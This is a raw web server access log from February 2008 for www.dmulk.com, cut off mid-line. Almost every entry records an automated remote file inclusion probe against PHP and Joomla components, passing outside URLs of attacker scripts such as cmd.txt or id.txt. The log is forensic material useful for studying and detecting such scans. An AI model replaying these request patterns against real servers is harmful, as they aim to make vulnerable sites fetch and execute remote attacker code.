201.225.251.165 - - [17/Feb/2008:12:03:44 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://cosmic.lydo.org/doc/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:12:04:17 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:24 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:24 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:24 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:26 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:26 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:26 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.200 - - [17/Feb/2008:12:04:32 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.200 - - [17/Feb/2008:12:04:32 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.190 - - [17/Feb/2008:12:04:32 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.200 - - [17/Feb/2008:12:04:32 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.190 - - [17/Feb/2008:12:04:33 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.190 - - [17/Feb/2008:12:04:33 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.110 - - [17/Feb/2008:12:04:34 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.110 - - [17/Feb/2008:12:04:34 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:04:38 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.200 - - [17/Feb/2008:12:04:47 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.176.255.158 - - [17/Feb/2008:12:05:11 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [17/Feb/2008:12:05:11 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [17/Feb/2008:12:05:11 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [17/Feb/2008:12:05:17 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.56.202 - - [17/Feb/2008:12:05:28 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.56.202 - - [17/Feb/2008:12:05:28 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.112.227.107 - - [17/Feb/2008:12:05:56 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
212.112.227.107 - - [17/Feb/2008:12:05:56 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.38.56.202 - - [17/Feb/2008:12:06:02 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.110 - - [17/Feb/2008:12:07:14 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:07:52 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:07:53 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:07:54 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.105.61.241 - - [17/Feb/2008:12:08:10 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://crime.fileave/klotok.txt?http://crime.fileave/klotok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.105.61.241 - - [17/Feb/2008:12:08:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://crime.fileave/klotok.txt?http://crime.fileave/klotok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:12:08:27 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:12:08:27 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:08:39 -0800] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:08:39 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:08:39 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.165 - - [17/Feb/2008:12:08:41 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:09:44 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.6.200 - - [17/Feb/2008:12:09:53 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.190 - - [17/Feb/2008:12:09:59 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [17/Feb/2008:12:10:02 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:10:30 -0800] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:10:31 -0800] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:10:31 -0800] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:12:11:24 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:12:11:25 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:12:11:25 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:12:11:32 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:23 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:23 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:23 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:23 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:24 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:24 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:25 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:25 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:12:26 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
24.176.255.158 - - [17/Feb/2008:12:12:44 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:12:13:20 -0800] "GET //init_basic.php?GALLERY_BASEDIR=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:12:13:21 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:14:42 -0800] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:14:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:14:44 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:12:16:15 -0800] "GET /index.php?option=com_gigcal&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.248.62.98 - - [17/Feb/2008:12:16:22 -0800] "GET /logs//login.php?dir=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
213.248.62.98 - - [17/Feb/2008:12:16:22 -0800] "GET //login.php?dir=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:18:29 -0800] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:18:29 -0800] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:18:30 -0800] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.13.114 - - [17/Feb/2008:12:19:45 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.marsradio.in/modules/Album/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.52.13.114 - - [17/Feb/2008:12:19:46 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.marsradio.in/modules/Album/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.52.13.114 - - [17/Feb/2008:12:20:32 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.marsradio.in/modules/Album/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:12:21:24 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:21:33 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [17/Feb/2008:12:21:34 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
213.248.62.98 - - [17/Feb/2008:12:21:34 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:21:48 -0800] "GET /logs/access_071230.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:21:48 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:12:21:49 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:12:22:03 -0800] "GET /index.php?option=com_gigcal&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:12:23:49 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:12:23:49 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:12:23:50 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:12:24:32 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:12:24:48 -0800] "GET /logs/access_080122.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:12:25:04 -0800] "GET //phpAdsNew/view.inc.php?phpAds_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:12:25:05 -0800] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:12:25:09 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:12:25:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.135.109.228 - - [17/Feb/2008:12:25:42 -0800] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.58.42 - - [17/Feb/2008:12:25:49 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://bashkllr.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
65.254.58.42 - - [17/Feb/2008:12:25:49 -0800] "GET //modules/My_eGallery/index.php?basepath=http://bashkllr.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
217.31.58.188 - - [17/Feb/2008:12:28:10 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.31.58.188 - - [17/Feb/2008:12:28:10 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.42.64.230 - - [17/Feb/2008:12:28:49 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.64.230 - - [17/Feb/2008:12:28:49 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.64.230 - - [17/Feb/2008:12:28:49 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:12:29:02 -0800] "GET /logs/access_071230.log//////?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:12:29:03 -0800] "GET //////?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 200 2966 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:12:29:03 -0800] "GET /logs//////?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 200 35704 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:12:29:33 -0800] "GET //main.php?sayfa=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.64.230 - - [17/Feb/2008:12:30:13 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.91.66.79 - - [17/Feb/2008:12:30:40 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.172 - - [17/Feb/2008:12:31:13 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 1814141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:33:36 -0800] "GET /logs/access_071230.log//////?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:12:33:37 -0800] "GET //////?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 200 2966 "-" "libwww-perl/5.64" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:12:33:37 -0800] "GET /logs/access_080201.log//mcf.php